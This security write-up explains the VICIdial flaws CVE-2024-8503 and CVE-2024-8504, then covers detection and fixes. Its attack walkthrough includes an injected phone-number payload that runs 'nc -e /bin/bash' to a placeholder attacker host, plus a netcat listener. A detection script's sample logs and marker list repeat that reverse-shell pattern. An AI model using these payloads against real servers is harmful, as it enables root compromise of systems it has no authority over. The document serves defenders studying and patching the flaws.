VICIdial, the open-source call center suite, is trusted by thousands of organizations for handling high-volume calls. In September 2024 two serious vulnerabilities, CVE-2024-8503 and CVE-2024-8504, were published that together form a complete unauthenticated-to-root attack chain. By chaining them, an attacker who can merely reach the web interface can end up running commands as root on the underlying server.
This deep dive will show you (in plain English) how an attacker can abuse these weaknesses, with examples and key takeaways for defenders.
What is CVE-2024-8504?
CVE-2024-8504 affects VICIdial through its agent interface. Any authenticated user with only agent privileges can abuse backend scripts to execute arbitrary shell commands as root on the VICIdial server. That covers everything from data theft to complete system takeover.
CVE-2024-8504 Official Reference
- NVD Entry for CVE-2024-8504
- VICIdial Project
The Attack Chain: CVE-2024-8503 + CVE-2024-8504
CVE-2024-8503 is an unauthenticated time-based SQL injection. It lets an attacker enumerate database records without logging in, and because VICIdial stores agent and admin credentials in plaintext by default, those records include working logins. Combine it with CVE-2024-8504 and an attacker goes from no account to root-level access in a few requests.
Get In as an Agent
CVE-2024-8503 is used to extract an agent's plaintext credentials from the database. The attacker then logs into the agent interface as that agent.
Send a Malicious Command
Using the agent interface, the attacker abuses a vulnerable parameter that a VICIdial script passes directly to system() or a similar call running as root.
Step 1: Acquire Agent Access (Via CVE-2024-8503)
Once the SQL injection has yielded an agent's plaintext credentials, the attacker logs into the agent interface (/agc/vicidial.php) like any agent would. The sketch below is illustrative: the form field names are placeholders, not VICIdial's real parameter names.
import requests
# Log in as an agent with credentials recovered via CVE-2024-8503
session = requests.Session()
payload = {
'user': '1001',           # agent login extracted from the database
'pass': 'recovered_pass', # plaintext password extracted from the database
}
r = session.post('http://victim/agc/vicidial.php', data=payload)
Step 2: Trigger the Vulnerable Parameter (CVE-2024-8504)
The vulnerability class is classic OS command injection: agent-supplied input reaches a backend helper script (VICIdial's Perl helpers, such as AST_VDremote_agents.pl, run as root) and is interpolated into a shell command string.
Imagine a POST request that lets the agent set a phone number or custom field, and the server-side script builds a command like this (simplified illustration, not VICIdial's actual code):
# Vulnerable Perl (simplified illustration)
use CGI qw(param);
my $phone = param('phone');                      # attacker-controlled
system("vicidial_some_command --phone='$phone'"); # interpolated straight into a shell string
Because $phone is pasted unescaped inside a single-quoted shell argument, the attacker only has to close that quote and append a command; a trailing # comments out the script's own closing quote:
# Malicious phone number for command injection
exploit_phone = "12345'; nc -e /bin/bash attacker.ip 4444 #"
data = {
'phone': exploit_phone,
# plus any other required agent params
}
r = session.post('http://victim/vicidial/agent_api.php', data=data)  # illustrative endpoint
Result: the shell sees vicidial_some_command --phone='12345'; nc -e /bin/bash attacker.ip 4444 #' and runs nc -e /bin/bash attacker.ip 4444 as root, spawning a reverse shell.
# On the attacker's machine
nc -lvnp 4444
# Wait for the root shell to connect back
- Runs as root: any command can be executed, from installing backdoors to erasing files, with no further privilege escalation needed.
- Hard to detect: the attack rides on a seemingly normal agent action, so web and VICIdial logs show an ordinary agent request. Catching it needs process-level telemetry, such as a root shell or netcat spawned beneath a VICIdial helper script.
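Since the web logs look benign, the practical detection point is process execution. The following is an added example, not part of the original write-up or the VICIdial project: it parses a few constructed Linux auditd execve records (assuming an audit rule such as -a always,exit -F arch=b64 -S execve -k exec, with arguments already hex-decoded as ausearch -i would print them) and flags root processes that are network tools or shells carrying a reverse-shell command line, reporting the Perl-script ancestry that a VICIdial helper would leave. The PIDs, IP address and paths are constructed sample data.

```python
"""Added example: hunt for the chain's footprint in auditd execve records.

Constructed sample data; not VICIdial code. Real auditd hex-encodes any
argument containing spaces or quotes, so run the log through `ausearch -i`
(or decode a0..aN yourself) before feeding it to parse_audit().
"""
import re

FIELD_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')
MSG_RE = re.compile(r"msg=audit\((\d+\.\d+):(\d+)\)")

NET_TOOLS = {"nc", "ncat", "netcat", "socat"}
SHELLS = {"sh", "bash", "dash"}
SCRIPT_HOSTS = {"perl", "php", "php-fpm", "httpd", "apache2"}
INJECTION_MARKERS = ("nc -e", "/dev/tcp/", "bash -i", "| sh", "| bash")

# Constructed audit log: a root Perl helper spawns `sh -c` with the injected
# command, which spawns nc; plus a benign root cron job that must not alert.
SAMPLE_AUDIT_LOG = [
    'type=SYSCALL msg=audit(1725994500.101:1001): arch=c000003e syscall=59 success=yes exit=0 ppid=1500 pid=2000 auid=4294967295 uid=0 gid=0 euid=0 comm="perl" exe="/usr/bin/perl" key="exec"',
    'type=EXECVE msg=audit(1725994500.101:1001): argc=2 a0="perl" a1="/usr/share/astguiclient/AST_VDremote_agents.pl"',
    'type=SYSCALL msg=audit(1725994500.250:1002): arch=c000003e syscall=59 success=yes exit=0 ppid=2000 pid=2001 auid=4294967295 uid=0 gid=0 euid=0 comm="sh" exe="/bin/sh" key="exec"',
    'type=EXECVE msg=audit(1725994500.250:1002): argc=3 a0="sh" a1="-c" a2="vicidial_some_command --phone=\'12345\'; nc -e /bin/bash 198.51.100.7 4444 #\'"',
    'type=SYSCALL msg=audit(1725994500.260:1003): arch=c000003e syscall=59 success=yes exit=0 ppid=2001 pid=2002 auid=4294967295 uid=0 gid=0 euid=0 comm="nc" exe="/bin/nc" key="exec"',
    'type=EXECVE msg=audit(1725994500.260:1003): argc=5 a0="nc" a1="-e" a2="/bin/bash" a3="198.51.100.7" a4="4444"',
    'type=SYSCALL msg=audit(1725994560.000:1004): arch=c000003e syscall=59 success=yes exit=0 ppid=900 pid=2100 auid=4294967295 uid=0 gid=0 euid=0 comm="sh" exe="/bin/sh" key="exec"',
    'type=EXECVE msg=audit(1725994560.000:1004): argc=3 a0="sh" a1="-c" a2="/usr/share/astguiclient/AST_cleanup_agent_log.pl"',
]


def parse_audit(lines):
    """Group SYSCALL and EXECVE records by audit event id into one dict per execve."""
    events = {}
    for line in lines:
        m = MSG_RE.search(line)
        if not m:
            continue
        ev = events.setdefault(int(m.group(2)), {"ts": float(m.group(1)), "argv": []})
        fields = {k: v.strip('"') for k, v in FIELD_RE.findall(line)}
        if fields.get("type") == "SYSCALL":
            ev.update(pid=int(fields["pid"]), ppid=int(fields["ppid"]),
                      uid=int(fields["uid"]), comm=fields["comm"], exe=fields["exe"])
        elif fields.get("type") == "EXECVE":
            ev["argv"] = [fields[f"a{i}"] for i in range(int(fields["argc"]))]
    return [events[k] for k in sorted(events)]


def ancestry(ev, by_pid):
    """Walk ppid links through the events we have; returns root-most first."""
    chain, seen = [], set()
    cur = by_pid.get(ev.get("ppid"))
    while cur and cur["pid"] not in seen:
        seen.add(cur["pid"])
        chain.append(cur["comm"])
        cur = by_pid.get(cur["ppid"])
    return chain[::-1]


def detect(events):
    """Flag root execs of network tools, or root shells whose command line
    carries a reverse-shell marker, and annotate with script-host ancestry."""
    by_pid = {ev["pid"]: ev for ev in events if "pid" in ev}
    alerts = []
    for ev in events:
        if ev.get("uid") != 0:
            continue
        prog = ev["exe"].rsplit("/", 1)[-1]
        cmdline = " ".join(ev["argv"])
        reasons = []
        if prog in NET_TOOLS:
            reasons.append(f"root ran network tool {prog}")
        if prog in SHELLS and any(mk in cmdline for mk in INJECTION_MARKERS):
            reasons.append("root shell command line contains reverse-shell marker")
        if not reasons:
            continue
        lineage = ancestry(ev, by_pid)
        if any(c in SCRIPT_HOSTS for c in lineage):
            reasons.append("spawned under " + " > ".join(lineage))
        alerts.append({"pid": ev["pid"], "cmd": cmdline, "reasons": reasons})
    return alerts


def scan(lines):
    """Convenience wrapper: raw audit lines in, alert dicts out."""
    return detect(parse_audit(lines))


if __name__ == "__main__":
    for alert in scan(SAMPLE_AUDIT_LOG):
        print(alert["pid"], alert["cmd"], "|", "; ".join(alert["reasons"]))
```

The benign cron-launched helper (pid 2100) is a root sh -c too, which is why the rule keys on the command-line markers and the network-tool binary rather than on "root spawned a shell": VICIdial's own Perl scripts call system() constantly, so that alone would be noise.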
How to Fix and Defend
1. Patch Immediately: Upgrade VICIdial to the latest fixed version; see the official changelog.
2. Never Build Shell Commands From Input: Don't interpolate user-controlled values into strings handed to system() or a shell. Validate against a strict allow-list (a phone number is digits only) and pass arguments as a list so no shell parses them, or call the underlying API directly.
3. Fix the SQL Side Too: CVE-2024-8503 is an injection in a database query, so the same rule applies there: parameterized queries only, and stop storing plaintext passwords.
4. Apply Privilege Separation: Anything reachable from the agent interface should not run as root. If a helper needs elevated rights for one operation, isolate that operation behind a narrowly scoped sudo rule or a dedicated service account.
5. Limit Exposure: Keep the VICIdial web interface off the open internet (VPN or IP allow-listing) so that an unauthenticated bug cannot be reached by anyone on the web.
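To make the Step 2 injection and the fix in item 2 concrete, here is an added example (not VICIdial's code): the same "paste the phone number into a shell string" mistake reproduced in Python beside its hardened form. The real dialer helper is stood in for by echo, and the injected payload is a harmless echo INJECTED instead of a reverse shell; everything else about the string is the shape used in Step 2.

```python
"""Added example, not VICIdial code: command injection reproduced and fixed.

Stand-ins: `echo` plays the role of the privileged dialer helper, and the
payload runs `echo INJECTED` where the real attack would run nc.
"""
import re
import subprocess

# Same structure as the Step 2 payload: close the quote, add a command, comment out the rest.
MALICIOUS_PHONE = "12345'; echo INJECTED #"


def dial_vulnerable(phone: str) -> str:
    """Mirrors the Perl system("cmd --phone='$phone'"): the input is pasted into
    a string that /bin/sh parses, so a quote in the input ends the argument and
    whatever follows the ';' runs as a second command."""
    cmd = f"echo dialing --phone='{phone}'"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


PHONE_RE = re.compile(r"[0-9]{3,15}")


def validate_phone(phone: str) -> str:
    """Allow-list validation: digits only, plausible length; reject everything else."""
    if not PHONE_RE.fullmatch(phone):
        raise ValueError(f"invalid phone number: {phone!r}")
    return phone


def dial_list_form_only(phone: str) -> str:
    """No validation, but argv list form: no shell is involved, so even the
    malicious string is just one argument to echo and nothing extra runs."""
    argv = ["echo", "dialing", f"--phone={phone}"]
    return subprocess.run(argv, capture_output=True, text=True, check=True).stdout


def dial_hardened(phone: str) -> str:
    """Both defences together: validate first, then list-form exec."""
    return dial_list_form_only(validate_phone(phone))


def rejects(phone: str) -> bool:
    """True if the hardened path refuses the input before running anything."""
    try:
        validate_phone(phone)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable :", repr(dial_vulnerable(MALICIOUS_PHONE)))
    print("list form  :", repr(dial_list_form_only(MALICIOUS_PHONE)))
    print("hardened   : rejected =", rejects(MALICIOUS_PHONE))
    print("hardened   :", repr(dial_hardened("12345")))
```

The list-form-only variant is included deliberately: it shows that taking the shell out of the picture already neutralises the injection, while the allow-list catches the bad input before any process starts. Keep both, since the next helper down the line may itself hand the value to a shell.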
Resources
- CVE-2024-8503 at NVD
- CVE-2024-8504 at NVD
- VICIdial Official Website
- OS Command Injection (OWASP)
Conclusion
CVE-2024-8504 is a textbook example of why input validation and privilege separation are crucial. When chained with CVE-2024-8503, an ordinary agent, or anyone who can reach the web interface, can own your server as root in a handful of POST requests.
If you're running VICIdial, patch now, review your configuration and exposure, and keep security at the front of your operations.
Timeline
Published on: 09/10/2024 20:15:05 UTC
Last modified on: 09/12/2024 14:35:23 UTC